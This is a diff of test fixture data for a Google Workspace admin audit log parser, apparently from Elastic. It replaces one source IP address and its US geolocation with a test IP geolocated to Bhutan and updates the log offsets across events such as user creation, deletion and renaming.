         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3099,27 +2887,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 23093,
+        "log.offset": 23040,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3143,7 +2927,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNBLOCK_USER_SESSION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3156,27 +2940,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 23485,
+        "log.offset": 23431,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3200,7 +2980,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UNENROLL_USER_FROM_TITANIUM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3213,27 +2993,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 23869,
+        "log.offset": 23814,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3257,7 +3033,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ARCHIVE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3270,27 +3046,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 24260,
+        "log.offset": 24204,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3314,7 +3086,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPDATE_BIRTHDATE\",\"parameters\":[{\"name\":\"BIRTHDATE\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3328,27 +3100,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 24636,
+        "log.offset": 24579,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3372,7 +3140,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "creation",
@@ -3385,27 +3153,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 25068,
+        "log.offset": 25010,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3429,7 +3193,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "deletion",
@@ -3442,27 +3206,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 25443,
+        "log.offset": 25384,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3486,7 +3246,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNGRADE_USER_FROM_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3499,27 +3259,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 25818,
+        "log.offset": 25758,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3543,7 +3299,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_ENROLLED_IN_TWO_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3556,27 +3312,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 26207,
+        "log.offset": 26146,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3600,7 +3352,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_USERLIST_CSV\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -3611,26 +3363,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 26609,
+        "log.offset": 26547,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3651,7 +3399,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MOVE_USER_TO_ORG_UNIT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3666,27 +3414,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 26930,
+        "log.offset": 26867,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3710,7 +3454,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3724,27 +3468,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 27389,
+        "log.offset": 27325,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3768,7 +3508,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RENAME_USER\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -3782,27 +3522,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 27834,
+        "log.offset": 27769,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
